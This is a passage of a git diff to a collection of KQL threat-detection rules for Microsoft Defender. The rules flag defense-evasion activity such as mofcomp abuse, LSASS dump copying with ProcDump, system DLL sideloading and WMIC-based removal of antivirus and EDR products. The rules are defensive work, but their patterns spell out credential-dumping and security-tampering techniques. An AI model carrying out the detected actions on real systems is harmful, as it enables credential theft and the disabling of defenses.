2022-07-12 +// Level: high +// Description: Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. +// The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. +// Attackers abuse this utility to install malicious MOF scripts +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where (((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") or (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%")) and (FolderPath endswith "\\mofcomp.exe" or ProcessVersionInfoOriginalFileName =~ "mofcomp.exe")) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"))) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql b/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql index 04bb8eee..aa27fb56 100644 --- a/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql +++ b/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql @@ -1,13 +1,13 @@ -// Title: Potential Suspicious Windows Feature Enabled - ProcCreation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-29 -// Level: medium -// Description: Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. -// Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Legitimate usage of the features listed in the rule. - -DeviceProcessEvents +// Title: Potential Suspicious Windows Feature Enabled - ProcCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-29 +// Level: medium +// Description: Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. +// Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate usage of the features listed in the rule. + +DeviceProcessEvents | where (ProcessCommandLine contains "Enable-WindowsOptionalFeature" and ProcessCommandLine contains "-Online" and ProcessCommandLine contains "-FeatureName") and (ProcessCommandLine contains "TelnetServer" or ProcessCommandLine contains "Internet-Explorer-Optional-amd64" or ProcessCommandLine contains "TFTP" or ProcessCommandLine contains "SMB1Protocol" or ProcessCommandLine contains "Client-ProjFS" or ProcessCommandLine contains "Microsoft-Windows-Subsystem-Linux") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql b/KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql index b1432564..492cefa5 100644 --- a/KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql +++ b/KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql @@ -1,12 +1,12 @@ -// Title: Potential SysInternals ProcDump Evasion -// Author: Florian Roth (Nextron Systems) -// Date: 2022-01-11 -// Level: high -// Description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access -// False Positives: -// - False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming - -DeviceProcessEvents +// Title: Potential SysInternals ProcDump Evasion +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-11 +// Level: high +// Description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access +// False Positives: +// - False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming + +DeviceProcessEvents | where (ProcessCommandLine contains "copy procdump" or ProcessCommandLine contains "move procdump") or ((ProcessCommandLine contains "2.dmp" or ProcessCommandLine contains "lsass" or ProcessCommandLine contains "out.dmp") and (ProcessCommandLine contains "copy " and ProcessCommandLine contains ".dmp ")) or (ProcessCommandLine contains "copy lsass.exe_" or ProcessCommandLine contains "move lsass.exe_") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql b/KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql index c953acae..c1aa955e 100644 --- a/KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql +++ b/KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql @@ -1,12 +1,12 @@ -// Title: Potential System DLL Sideloading From Non System Locations -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-14 -// Level: high -// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.). -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Legitimate applications loading their own versions of the DLLs mentioned in this rule - -DeviceImageLoadEvents +// Title: Potential System DLL Sideloading From Non System Locations +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-14 +// Level: high +// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.). +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLLs mentioned in this rule + +DeviceImageLoadEvents | where (FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\batmeter.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certcli.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cfgmgr32.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\d3dx9_43.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\eappcfg.dll" or FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sensapi.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\tapi32.dll" or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\textshaping.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winscard.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsdapi.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wbemcomn.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll") and (not(((FolderPath endswith "\\version.dll" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or (FolderPath endswith "\\d3dx9_43.dll" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.DirectXRuntime_") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\SyChpe32\\")))) and (not((((FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl") and FolderPath startswith "C:\\Program Files\\Arsenal-Image-Mounter-") or FolderPath startswith "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (FolderPath endswith "\\PolicyManager.dll" and (FolderPath startswith "C:\\Program Files\\CheckPoint\\" or FolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\")) or (FolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath endswith "\\wldp.dll" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs") or (FolderPath endswith "\\mswb7.dll" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\") or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" and FolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql b/KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql index 6e2f0e2b..384b51d3 100644 --- a/KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql +++ b/KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql @@ -1,12 +1,12 @@ -// Title: Potential Tampering With Security Products Via WMIC -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-01-30 -// Level: high -// Description: Detects uninstallation or termination of security products using the WMIC utility -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate administration - -DeviceProcessEvents +// Title: Potential Tampering With Security Products Via WMIC +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-01-30 +// Level: high +// Description: Detects uninstallation or termination of security products using the WMIC utility +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administration + +DeviceProcessEvents | where ((ProcessCommandLine contains "wmic" and ProcessCommandLine contains "product where " and ProcessCommandLine contains "call" and ProcessCommandLine contains "uninstall" and ProcessCommandLine contains "/nointeractive") or ((ProcessCommandLine contains "call delete" or ProcessCommandLine contains "call terminate") and (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "caption like ")) or (ProcessCommandLine contains "process " and ProcessCommandLine contains "where " and ProcessCommandLine contains "delete")) and (ProcessCommandLine contains "%carbon%" or ProcessCommandLine contains "%cylance%" or ProcessCommandLine contains "%endpoint%" or ProcessCommandLine contains "%eset%" or ProcessCommandLine contains "%malware%" or ProcessCommandLine contains "%Sophos%" or ProcessCommandLine contains "%symantec%" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "AVG " or ProcessCommandLine contains "Carbon Black" or ProcessCommandLine contains "CarbonBlack" or ProcessCommandLine contains "Cb Defense Sensor 64-bit" or ProcessCommandLine contains "Crowdstrike Sensor" or ProcessCommandLine contains "Cylance " or ProcessCommandLine contains "Dell Threat Defense" or ProcessCommandLine contains "DLP Endpoint" or ProcessCommandLine contains "Endpoint Detection" or ProcessCommandLine contains "Endpoint Protection" or ProcessCommandLine contains "Endpoint Security" or ProcessCommandLine contains "Endpoint Sensor" or ProcessCommandLine contains "ESET File Security" or ProcessCommandLine contains "LogRhythm System Monitor Service" or ProcessCommandLine contains "Malwarebytes" or ProcessCommandLine contains "McAfee Agent" or ProcessCommandLine contains "Microsoft Security Client" or ProcessCommandLine contains "Sophos Anti-Virus" or ProcessCommandLine contains "Sophos AutoUpdate" or ProcessCommandLine contains "Sophos Credential Store" or ProcessCommandLine contains "Sophos Management Console" or ProcessCommandLine contains "Sophos Management Database" or ProcessCommandLine contains "Sophos Management Server" or ProcessCommandLine contains "Sophos Remote Management System" or ProcessCommandLine contains "Sophos Update Manager" or ProcessCommandLine contains "Threat Protection" or ProcessCommandLine contains "VirusScan" or ProcessCommandLine contains "Webroot SecureAnywhere" or ProcessCommandLine contains "Windows Defender") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql index 890d0fc3..37b7fd37 100644 --- a/KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql +++ b/KQL/rules/Defense Evasion/potential_wazuh_security_platform_dll_sideloading.kql @@ -1,12 +1,12 @@ -// Title: Potential Wazuh Security Platform DLL Sideloading -// Author: X__Junior (Nextron Systems) -// Date: 2023-03-13 -// Level: medium -// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - Many legitimate applications leverage 